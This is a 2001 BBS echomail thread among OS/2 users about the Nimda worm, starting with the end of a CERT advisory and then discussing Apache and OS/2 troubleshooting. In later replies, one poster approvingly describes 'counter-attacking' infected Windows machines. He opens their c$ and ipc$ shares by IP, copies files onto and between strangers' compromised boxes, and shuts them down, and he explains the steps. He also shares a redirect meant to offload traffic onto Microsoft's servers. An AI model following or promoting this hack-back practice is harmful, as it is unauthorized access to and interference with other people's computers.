http://www.antivirus.com/vinfo/virusencyclo/default5.asp?VName=TROJ_NIMDA.A
http://www.antivirus.com/pc-cillin/vin fo/virusencyclo/default5.asp?VName=TROJ_NIMDA.A


References

You may wish to visit the CERT/CC's computer virus resources page located at

http://www.cert.org/other_sources/viruses.html

Feedback on this document may be directed to the authors, Roman Danyliw, Chad Dougherty, Allen Householder, Robin Ruefle.

This document is available from:
http://www.cert.org/advisories/CA-2001-26.html


CERT/CC Contact Information

Email: cert@cert.org
Phone: +1 412-268-7090 (24-hour hotline)
Fax: +1 412-268-6989
Postal address:
CERT Coordination Center
Software Engineering Institute
Carnegie Mellon University
Pittsburgh PA 15213-3890
U.S.A.

CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday
through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends.


Using encryption

We strongly urge you to encrypt sensitive information sent by email. Our public
PGP key is available from

http://www.cert.org/CERT_PGP.key

If you prefer to use DES, please call the CERT hotline for more information.


Getting security information

CERT publications and other security information are available from our web site

http://www.cert.org/

To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message

subscribe cert-advisory

* "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office.


NO WARRANTY
Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement.


Conditions for use, disclaimers, and sponsorship information

http://www.cert.org/leagl_stuff.html


Copyright 2001 Carnegie Mellon University.


Revision History

September 18, 2001: Initial Release
September 19, 2001: Updated link to MS advisory MS01-027
September 19, 2001: Updated antivirus vendor information,
updated e-mail propagation description,
added reference to second related IIS vul
September 20, 2001: Added link to Computer Associates in
vendor information,
Updated overview, payload, file system
propagation, and recommendations for
system administrator sections
September 20, 2001: Fix link to CA-2001-12 in payload section
September 21, 2001: Added recommendations for network
administrators,
updated payload section,
updated vendor information clarified
recommendations for end user systems
September 25, 2001: Qualified note concerning MS01-027

===== end quoting http://www.cert.org/advisories/CA-2001-26.html =====

)\/(ark


* Origin: (1:3634/12)

patching process... in a few cases, i've even called
them on the phone and talked to them directly telling
them who i was, what i was doing, and why... you
should hear some of their comments when i tell them
certain steps (like placing a file in a certain place
and they see it pop into existance via drag and drop
from my desktop! or when i send the shutdown command)
that i'm doing... there are times that i really wish
that i could see and capture their facial
expressions...

Sorry for my twisted humor personality, but you remember back
when I think it was Jack Lemmon played the Devil, had turned
this poor soul into a parrot? He didn't like it's looks, so
he wrenched the beak around qrotesquely, looked at it with a
tilted head like a parrot does, and then commented out of the
side of his mouth, "Definitely Piccasso!" ;)

yup!! i don't exactly remember the "skit" but the statement is rightous!

[trim]

I can reason this load-linee out mentally..

yup, seems so...

or whatever... i guess it may also help that that box
runs quite a few tasks all the time... from a clean
boot, CTRL-ESC shows twenty-three (23) tasks running
and those are running all the time as that machine's
server ops that i employ here...

But in this case, we're dealing with a problem, I think, at
core level in the Kernel that sneaked in here at W40508 level.

ok... i don't know if you are aware of it or if i've stated it during these exchanges, my system is warp 3 connect w/fp40 only... nothing else applied... the default warp 3 connect tcp/ip and mpts unless something in fp40 changed something in them...

It wasn't there for the original level of FP 15. Showed up
when I upgraded the Kernel only. I didn't get it caught in
time and figured out to report it in Testcase officially. In
the couple of months it took me isolate a trap like this that
doesn't even trap the box and leaves no way to trace it,
things went far forward from W40508. Plus, who in heck wants
to work with the Adaptec 1542C level cards which is the only
place I see it? As well, I'm not at all sure the Kernel is
really even the cause, as I've sorta now pinned it on the
SYSTEM checking CANARY deal from Norman in conjunction with
this.

errrhummmmm... CANARY?? i understand that norman is a virus scanner, correct?

To date Norman hasn't even answered the support help
request... ;(

oh, doesn't that leave warm fuzzies <<SIGH>>

I'm cable hosted. ....

uuugh... that does toss in a bit of a sticky wicket,
eh? hummm... maybe you can run some sort of monitor
that checks that tcp/ip is up and operational before
apache is launched... you don't think it could be an
EMX thing failing, do you? what level are you at with
EMX and are you using the runtime only or the
development??

I'm at current level 4.09 as I recall.

4.09 which one? hehehe... j/k... though there are fixes out for 4.09... i think
that i may be short one (ie: on fix3 and fix4 is out)...

It reports, I think,
61 in the version dump screen. I'm also using the full
development game, but really don't need that for this box.
It's just easier to set up and dump in a common format for
stuff like this everywhere than do this on one box and that on
another.

ok... i, too, use the full development stuff for pretty much the same reason...
that and because i get curious at times and attempt to code me something in it <<GG>>

Thanks,

This one showed up directly here on OS2INET by the way.

ok... your replies have all been coming back on OS2DOSBBS, though... yes, all my messages in this run are also in OS2DOSBBS... i didn't want to loose or confuse you any more than may already be... i'd rather get the info out to you and then get the other stuff straight... in any case, give your configs a going
over or whatever and let's see if we can figure out why your replies are crossing over (no, not the john edward way) to OS2DOSBBS when they are being written in the proper area...

oh hey! could it be that maybe the storage files for those two areas is crosslinked on disk somehow??

)\/(ark (watching for test in OS2INET to arrive in OS2INET)


* Origin: (1:3634/12)

[picking up from last message]

right?

yes, pretty much... i think i'd trap on
"/path/root.exe" and each of the others... in
otherwords, just shorten it enough to get just that
stuff without having to parse too much... it really
should be enough to let apache handle it but it is
possible that one may see 1000+ hits per second from
NIMDAs all over the first two ip octets you're in...

I think I know enough to begin writing here... Trying to
triage all this into what is most proactical (I'll leave you
to figure out about four terrible pun relationships in that
coineed word!) at this point!

hehehe, yes, i know what you mean but i'm not sure i got the puns <<GG>>

as far as the nimda attack stuff, see my next message... it is the CERT advisory on NIMDA... this does not include the new NIMDA.E variant that is using two additional attack URL "vectors"...

yes, that should work... hopefully ijfire won't get
bogged down trying to handle the possible high numbers
of hits or even get taken out, itself...

I've read into that this can happen but hav no information on
what the chances are based on this level of attack rates.

i believe that it is (even) possible for a router or firewall to become a bottleneck if they are using a lot of filters and/or having to filter a lot of traffic... imagine 10 NIMDA infected machines in the same 192.168.xx.xx address
range as you are... those machine fire off their 16 URL requests at the same time... that's 160 requests at once that your machine will have to handle... now, say that each NIMDA'd machine also hits you with each request 500 times...
now we're looking at 80000 hits that something has to handle... on my stuff here, i've seen 500 hits logged over a few minutes (ie: one or two IIRC)... that can be a major amount of traffic for something to have to work with...

ok... i'll add that address to my abuse addresses list... don't know
that i'll need it unless i get hit from there during
one/some of the random ip number generation attacks
that nimda uses... in many cases, i've been able to
hop over to one of the windows boxes, here, and smack
that attacking machine right off the entire network...

How delicate!

hehe, the first time i did it and it worked as was described to me, i was extatic<sp?>... after that, it became almost routine... do this, do that, open this, drag that over here and drop it over there, send the signal, watch the machine disappear from the 'net... after doing that some 100+ times, it's become almost rote and burnout boring... the problem that "we" face now is that
many of those NIMDA'd boxes have had windows security settings adjusted such that one doesn't have security rights to access some of the needed items to be able to get in and shut the machine down... but the box is still infected and attacking... and when one is dealing with dialups and, i guess, cable/dsl feeds, it can become quite a chore for anyone to figure out what box is infected... the number of systems that have frontpage installed and subsequently personal web server or IIS and the users don't even know is abominal... such is the life that m$ wants to create... a world of sheeple... hummm, that sounds almost talibanish...

['nother trim for length <<GG>>]

)\/(ark


* Origin: (1:3634/12)

uuuggghhh... and here i sit behind injoy v2.0b with
nothing else between that box and the net... have that
apache/2 1.3.22 server running and a couple of
aliasmatch statements in httpd.conf to at least send
something i want to send back... in fact, my stuff has
a bit more output than many because i fully expect
that some stuff may be being sent manually by a person
attempting to hack in themselves...

Interesting.

what's interesting? the part about me just using injoy v2.0b or the part about manually keying those URLs?

FWIW: it is the manual keying of those URLs that allows one to begin to "counter-attack"... if on of those /c+dir commands returns a directory listing,
then the system security is compromised enough to get a start at beating the nasty down... but it does require the use of other tools and accessing the system via additional means... on a windows box, start->run and entering

\\ip.number.of.machine\c$

will gain you access to the compromised system's c$ share... one can also do the same for the \ipc$ share... this only works if that security stuff is compromised like the webserver's security has been... once one can access the \c$ (or whatever$) on a windows box, it's all GUI from there, pretty much... one can drag'n'drop anything from either machine to anywhere else... hehe, a "funny" i did one time was to copy files that i had created from one compromised box to another compromised box... i did that only just to see if it
would work... i highly suspected it would and was rewarded for my efforts <<GG>>

here's those aliasmatch statements...

Snipped for bandwidth but put into the keep and learn how to
do this!

you might also find this one useful...

Ditto.

you're welcome <<GG>>

RedirectMatch (.*).ico$ http://www.microsoft.com$1.ico

# That one liner above will redirect all ".ico" request from
# your server to the Microsoft server. Now you'll be letting
# their damm server deal with the errors and bandwidth. It
# will NOT interupt your traffic at all! If MS is going to
# request files from your server, it's only appropriate that
# they deal with the problems they cause...

Mmm . Mint Cookies, saved in notebook! Gee how little I know,
And I never really wanted to .. oh well. Such is life! ;)

hehehe, i know that feeling... the more i dig into the webserver stuff, especially apache, the more i want to try to create a bbs loadable module for it... however, i don't have the time or the drive (sadly) as i once did... not to mention that after 20+ years of being involved in the computer industry, i'm
in the process of a major career change... seems that driving a tractor-trailer
rig can net me more than double anything i've made working in the industry all these years and with a whole lot less stress... i just hope that boredom doesn't set in as it has with computers and lead to a burnout situation like i've had to deal with over the last few years... one can only answer the same question so many times before one explodes...

[chomping here to carry rest to another message due to the length that some of these have been getting to. it's a human thing rather than a technical thing <<GG>>]

)\/(ark


* Origin: (1:3634/12)